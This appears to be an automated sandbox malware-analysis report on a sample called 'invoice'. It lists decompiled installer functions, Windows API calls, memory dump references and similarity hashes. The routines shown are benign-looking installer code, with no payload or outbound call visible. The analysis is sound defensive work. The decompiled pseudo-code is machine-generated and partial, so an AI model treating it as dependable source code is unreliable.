GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040278A
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027A6
GlobalFree.KERNEL32(?), ref: 004027E5
GlobalFree.KERNEL32(00000000), ref: 004027F8
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402810
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402824

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 0a6e144848f4cf5ec871b7427f26d1c5b8ffe33ee9db8fbfbd958a55083b1002
Instruction ID: 6644526d81fa5c7ff175c86addd85cc92bc24fd3ec06af29a2511a4f4fc8a5d3
Opcode Fuzzy Hash: 0a6e144848f4cf5ec871b7427f26d1c5b8ffe33ee9db8fbfbd958a55083b1002
Instruction Fuzzy Hash: 3B21BC71800124BBDF216FA5DE89D9E7B79EF04324F10423AF924762E0CA784D418FA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040484D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040484D(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405F87(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405F87(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405F87(_t41, _t47, 0x42a870, 0x42a870, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a870), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42ebd8, _a4, 0x42a870);
			}

0x00404853
0x00404858
0x00404860
0x00404861
0x0040486e
0x00404876
0x00404877
0x00404879
0x0040487b
0x0040487d
0x00404880
0x00404880
0x00404887
0x0040488d
0x0040488d
0x00404894
0x0040489b
0x0040489e
0x004048a1
0x004048a1
0x004048a5
0x004048b5
0x004048b7
0x004048ba
0x00404863
0x00404863
0x0040486a
0x0040486a
0x004048c2
0x004048cd
0x004048e3
0x004048f3
0x0040490f

APIs

lstrlenA.KERNEL32(Yllerion Setup: Installing,Yllerion Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404768,000000DF,00000000,00000400,-00430000), ref: 004048EB
wsprintfA.USER32 ref: 004048F3
SetDlgItemTextA.USER32(?,Yllerion Setup: Installing), ref: 00404906

Strings

Yllerion Setup: Installing, xrefs: 004048DD, 004048E2, 004048E8, 004048FC
%u.%u%s%s, xrefs: 004048D5

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$Yllerion Setup: Installing
API String ID: 3540041739-850023234
Opcode ID: 54db272fd9225231769cced90d3b9a540a189ef805a7877c8ea43c669973e61d
Instruction ID: 46e1028d5dd9cf3fa3a12b124fa319e283dc00677a7b855ac62dacd231200cde
Opcode Fuzzy Hash: 54db272fd9225231769cced90d3b9a540a189ef805a7877c8ea43c669973e61d
Instruction Fuzzy Hash: 8D11E477A041282BEB0075699C41EBF3298DB82374F24463BFE65F21D1E979CC1246E9

Uniqueness

Uniqueness Score: -1.00%

Function 00401D3B Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401D3B(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x48);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402AC1(_t21), _t21,  *(_t27 - 0x40) *  *(_t27 - 0x20),  *(_t27 - 0x3c) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401d45
0x00401d4c
0x00401d7b
0x00401d83
0x00401d8a
0x00401d8a
0x00402954
0x00402960

APIs

GetDlgItem.USER32(?), ref: 00401D3F
GetClientRect.USER32(00000000,?), ref: 00401D4C
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
DeleteObject.GDI32(00000000), ref: 00401D8A

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: e7b13135481585f1ae21f8f3a2a21f2ebc81ae0f190e6cb519dc2edadbd9593c
Instruction ID: b94dd0b2fc2efe961c915ac3dbaedcbaa59703da1128c811c259d0727350af9e
Opcode Fuzzy Hash: e7b13135481585f1ae21f8f3a2a21f2ebc81ae0f190e6cb519dc2edadbd9593c
Instruction Fuzzy Hash: 6EF0FFB2600515BFDB00EBA4DE88DAFB7BCEB44301B04447AF645F2191CA748D018B38

Uniqueness

Uniqueness Score: -1.00%

Function 00401C04 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C04(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402A9F(3);
				 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402A9F(4);
				 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402AC1(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402AC1(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push("true");
				if(__eflags != 0) {
					_t59 = E00402AC1();
					_t32 = E00402AC1();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402A9F();
					 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
					_t41 = E00402A9F(2);
					 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E00405EC3();
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c04
0x00401c06
0x00401c0d
0x00401c10
0x00401c13
0x00401c1d
0x00401c21
0x00401c24
0x00401c2d
0x00401c2d
0x00401c30
0x00401c34
0x00401c3d
0x00401c3d
0x00401c40
0x00401c44
0x00401c46
0x00401c9b
0x00401c9d
0x00401ca6
0x00401cae
0x00401cb1
0x00401cb1
0x00401cba
0x00000000
0x00401c48
0x00401c4f
0x00401c51
0x00401c54
0x00401c5a
0x00401c61
0x00401c64
0x00401c8c
0x00401cc0
0x00401cc0
0x00401c66
0x00401c74
0x00401c7c
0x00401c7f
0x00401c7f
0x00401c64
0x00401cc3
0x00401cc6
0x00401ccc
0x004028f9
0x004028f9
0x00402954
0x00402960

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C

Strings

!, xrefs: 00401C40

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 8c877d5979cff4b3ce41adc99c27d6fc77d82e5cc3f5856b61787971cd0c7bbc
Instruction ID: bdc01a124477b6dd133b62af0939e03034df0dda3ad70936a50ebcebbcd9d6cc
Opcode Fuzzy Hash: 8c877d5979cff4b3ce41adc99c27d6fc77d82e5cc3f5856b61787971cd0c7bbc
Instruction Fuzzy Hash: 9F218F71A44209BEEB15DFA5D946AED7BB0EB84304F14803EF505F61D1DA7889408F28

Uniqueness

Uniqueness Score: -1.00%

Function 00403720 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403720() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x429834; // 0x6b5d78
				_t3 = E00403705(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						_t1 = _t6 + 8; // 0x10000000
						FreeLibrary( *_t1);
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x429834 =  *0x429834 & 0x00000000;
				return _t3;
			}

0x00403721
0x00403729
0x00403730
0x00403733
0x00403733
0x00403735
0x00403737
0x0040373a
0x00403741
0x00403747
0x0040374b
0x0040374c
0x00403754

APIs

FreeLibrary.KERNEL32(10000000,76793410,00000000,C:\Users\user\AppData\Local\Temp\,004036F8,00403512,?,?,00000006,00000008,0000000A), ref: 0040373A
GlobalFree.KERNEL32(006B5D78), ref: 00403741

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403720
x]k, xrefs: 00403721, 0040374C

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\$x]k
API String ID: 1100898210-3408944413
Opcode ID: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
Instruction ID: 7d8ce370987dd57b7bf148727d206b09ac62311aee63c146eb442539f55f5a8e
Opcode Fuzzy Hash: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
Instruction Fuzzy Hash: 39E0C27391212097C7313F54EE0871ABBA86F46B22F0A403AE8407B26487745C428BCC

Uniqueness

Uniqueness Score: -1.00%

Function 004058FD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004058FD(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}

0x004058fe
0x00405915
0x0040591d
0x0040591d
0x00405925

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031DE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00405903
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031DE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 0040590C
lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 0040591D

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004058FD

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
Instruction ID: 647ad7e742d71b16062aa4f61d1124f0b3f0fcedfae467302285f0529c6cb9e2
Opcode Fuzzy Hash: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
Instruction Fuzzy Hash: 46D0C9A2606A317AD21227159C09EDB6A4CCF57755B054076F640B61A1CA7C4D428BFE

Uniqueness

Uniqueness Score: -1.00%

Function 00402BB4 Relevance: 6.1, APIs: 4, Instructions: 64
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402BB4(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				char _v272;
				void* _t19;
				signed int _t26;
				intOrPtr* _t28;
				signed int _t33;
				signed int _t34;
				signed int _t35;

				_t34 = _a12;
				_t35 = _t34 & 0x00000300;
				_t33 = _t34 & 0x00000001;
				_t19 = E00405DEB(__eflags, _a4, _a8, _t35 | 0x00000008,  &_v8);
				if(_t19 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							RegCloseKey(_v8);
							return 1;
						}
						_t26 = E00402BB4(__eflags, _v8,  &_v272, _a12);
						__eflags = _t26;
						if(_t26 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t28 = E004062FD(3);
					if(_t28 == 0) {
						return RegDeleteKeyA(_a4, _a8);
					}
					return  *_t28(_a4, _a8, _t35, 0);
				}
				return _t19;
			}

0x00402bbf
0x00402bc8
0x00402bd1
0x00402bdd
0x00402be4
0x00402c08
0x00402bee
0x00402bf0
0x00402c43
0x00000000
0x00402c4b
0x00402bff
0x00402c04
0x00402c06
0x00000000
0x00000000
0x00402c06
0x00402c22
0x00402c2a
0x00402c31
0x00000000
0x00402c54
0x00000000
0x00402c3c
0x00402c5e

APIs

RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C19
RegCloseKey.ADVAPI32(?), ref: 00402C22
RegCloseKey.ADVAPI32(?), ref: 00402C43

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 11be2661f8599cd0237f1c1554e4f8b4188825d64962de0b1740bf644c97f38e
Instruction ID: b62f4967d327be975f6bbb281b4945b449d6b6e398a7fc8ef6fb9c274ae0afe8
Opcode Fuzzy Hash: 11be2661f8599cd0237f1c1554e4f8b4188825d64962de0b1740bf644c97f38e
Instruction Fuzzy Hash: 9A118832500109BBEF01AF91CF09B9E3B79EF08341F104036BA05B50E0E7B4EE52AB68

Uniqueness

Uniqueness Score: -1.00%

Function 00402CE4 Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402CE4(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x421428; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42f410;
						if(_t2 >  *0x42f410) {
							_t3 = CreateDialogParamA( *0x42f400, 0x6f, 0, E00402C61, 0);
							 *0x421428 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406339(0);
					}
				} else {
					_t6 =  *0x421428; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x421428 = 0;
					return _t6;
				}
			}

0x00402ceb
0x00402d05
0x00402d0b
0x00402d15
0x00402d1b
0x00402d21
0x00402d32
0x00402d3b
0x00000000
0x00402d40
0x00402d47
0x00402d0d
0x00402d14
0x00402d14
0x00402ced
0x00402ced
0x00402cf4
0x00402cf7
0x00402cf7
0x00402cfd
0x00402d04
0x00402d04

APIs

DestroyWindow.USER32(00000000,00000000,00402EC4,?), ref: 00402CF7
GetTickCount.KERNEL32 ref: 00402D15
CreateDialogParamA.USER32(0000006F,00000000,00402C61,00000000), ref: 00402D32
ShowWindow.USER32(00000000,00000005), ref: 00402D40

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 2469aab9b0bab78131693435c259bb338fdfc1179cff7f610c16a2f3c60769c5
Instruction ID: 5343e4f3fd542578671bd54a8d6f819db7b5394acccd132b40ed42660498aa91
Opcode Fuzzy Hash: 2469aab9b0bab78131693435c259bb338fdfc1179cff7f610c16a2f3c60769c5
Instruction Fuzzy Hash: 01F05430601521EBC7207F24FE8CA8F7A64BB08B11791047AF445B21F4DBB448C28B9C

Uniqueness

Uniqueness Score: -1.00%

Function 00405000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00405000(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t11;
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					__eflags = _t15 - 0x200;
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						__eflags = _t15 - 0x419;
						if(_t15 == 0x419) {
							__eflags =  *0x42a85c - _t16; // 0x0
							if(__eflags != 0) {
								_push(_t16);
								_push(6);
								 *0x42a85c = _t16;
								E004049D7();
							}
						}
						L11:
						return CallWindowProcA( *0x42a864, _a4, _t15, _a12, _t16);
					}
					_t11 = IsWindowVisible(_a4);
					__eflags = _t11;
					if(_t11 == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404957(_a4, "true");
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 == 0x20) {
					E00404072(0x413);
					return 0;
				}
				goto L10;
			}

0x00405004
0x0040500e
0x00405024
0x0040502a
0x0040504c
0x0040504f
0x0040504f
0x00405055
0x00405057
0x0040505d
0x0040505f
0x00405060
0x00405062
0x00405068
0x00405068
0x0040505d
0x00405072
0x00000000
0x00405080
0x0040502f
0x00405035
0x00405037
0x0040506f
0x0040506f
0x00000000
0x0040506f
0x00405043
0x00405045
0x00000000
0x00405045
0x00405014
0x0040501b
0x00000000
0x00405020
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 0040502F
CallWindowProcA.USER32(?,?,?,?), ref: 00405080

Part of subcall function 00404072: SendMessageA.USER32(000103BC,00000000,00000000,00000000), ref: 00404084

Strings

, xrefs: 00405010

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 0b5703a8dab1bd1bd7dd9e2c337de487c6e053b4983eba3ecfb903a9c205ce24
Instruction ID: 2f0027df7ddfe28b71d6e39f600ecebaf2ba5c74aec8f2e947ae9809186c917a
Opcode Fuzzy Hash: 0b5703a8dab1bd1bd7dd9e2c337de487c6e053b4983eba3ecfb903a9c205ce24
